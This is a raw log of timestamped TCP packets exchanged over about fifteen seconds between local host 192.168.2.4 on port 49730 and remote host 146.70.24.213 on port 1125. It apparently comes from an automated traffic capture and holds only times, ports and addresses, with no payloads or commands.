Oct 11, 2024 16:53:15.851707935 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.914273977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.919295073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.919346094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.924273968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:16.052788019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:16.101701021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:16.145076990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:16.195466995 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:16.258018017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:16.263184071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:16.263240099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:16.268413067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:16.383239031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:16.429828882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:16.473653078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:16.523597002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:16.586216927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:16.898605108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:16.986145020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:16.986166954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.241358042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.241451979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.241525888 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:17.351782084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:17.356724977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.356777906 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:17.361668110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.476686954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.523582935 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:17.567019939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.617429018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:17.679994106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:17.684931993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.685090065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:17.690004110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.820877075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.867368937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:17.911205053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:17.961110115 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.035171986 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.040610075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.043104887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.048002958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.164076090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.211219072 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.254539967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.305023909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.398823977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.403848886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.403913021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.408898115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.539427996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.586124897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.629740000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.679882050 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.742535114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.747845888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.748105049 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.753397942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.883105993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:18.929867983 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:18.974088907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.023600101 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.086205006 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.091293097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.091377020 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.096194983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.211772919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.257987976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.302613974 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.351708889 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.414386034 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.419631958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.419684887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.424596071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.539455891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.586152077 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.631237030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.679836035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.742400885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.747353077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.747416019 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.752266884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.867542028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:19.914213896 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:19.957993031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.008030891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:20.070633888 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:20.075613976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.075665951 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:20.080569983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.195700884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.242405891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:20.286371946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.337348938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:20.398722887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:20.713469982 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:20.727041006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.727096081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:20.729008913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.729023933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.821923018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.867624044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:20.913702011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:20.961505890 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.023812056 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.030364990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.030432940 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.035856962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.148504972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.195671082 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.239675045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.289253950 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.355205059 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.360713005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.360873938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.366420984 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.477638960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.523744106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.567286015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.617376089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.679991961 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.686140060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.686273098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.691226959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.804889917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.851752043 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:21.895581007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:21.945492029 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.008142948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.016385078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.016479969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.023339033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.133227110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.179897070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.223824024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.273624897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.336500883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.344737053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.344796896 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.349700928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.461527109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.507978916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.552165985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.601732016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.664341927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.669452906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.669522047 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.674395084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.790462017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.836286068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.881436110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.930022955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.992561102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:22.998378992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:22.998562098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.003531933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.118294001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.164233923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.208982944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.258023977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.320631027 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.325599909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.325656891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.330657005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.461496115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.508070946 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.552187920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.601789951 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.664357901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.669365883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.669486046 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.674523115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.789547920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.836170912 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.880013943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.930255890 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.993465900 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:23.998672009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:23.998728037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:24.003727913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.391450882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.391628981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.391685009 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:24.391865015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.392019033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:24.508282900 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:24.513335943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.513664961 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:24.518532991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.633410931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.679938078 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:24.723954916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.773648977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:24.836440086 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:24.841504097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.841582060 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:24.846416950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:24.961432934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.007978916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.052860022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.101735115 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.164551020 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.169790983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.169852972 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.174779892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.289994955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.336123943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.380486012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.429857969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.492481947 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.497389078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.500224113 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.505058050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.617449999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.664232969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.708033085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.757991076 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.820693970 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.825810909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.828178883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:25.833233118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.946657896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:25.992407084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.037149906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.086106062 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.149295092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.154542923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.154768944 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.159604073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.274208069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.320485115 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.368217945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.414222956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.492655039 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.497653961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.497709036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.502609015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.618256092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.664257050 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.709178925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.758239031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.820687056 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.825803041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.825907946 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:26.830784082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.945993900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:26.992376089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:27.037002087 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:27.086283922 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:27.148845911 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:27.153847933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:27.153939962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:27.159790039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:27.273941994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:27.320544004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:27.364504099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:27.414237976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:27.476847887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:27.787345886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:27.787431955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:27.787717104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:27.787769079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:27.792609930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:27.919208050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:27.976737022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.005094051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.054873943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.133128881 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.138261080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.140214920 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.145539999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.259156942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.304918051 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.348942995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.398695946 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.461380959 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.466468096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.466684103 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.471827030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.586592913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.632986069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.677373886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.726922035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.789407015 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.794415951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.794507027 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:28.799263000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.915481091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:28.961167097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.005356073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.054898977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.117939949 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.122961044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.123063087 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.128068924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.242799044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.289259911 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.333343983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.382991076 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.445719004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.450789928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.451169014 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.456099987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.570698977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.617475033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.661528111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.711198092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.773792028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.778872967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.778987885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:29.783840895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.899184942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:29.945513964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.004213095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.054941893 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.118060112 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.123171091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.123284101 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.128237963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.243063927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.289320946 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.333856106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:30.383014917 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:30.445873022 CEST	49730	1125	192.168.2.4	146.70.24.213
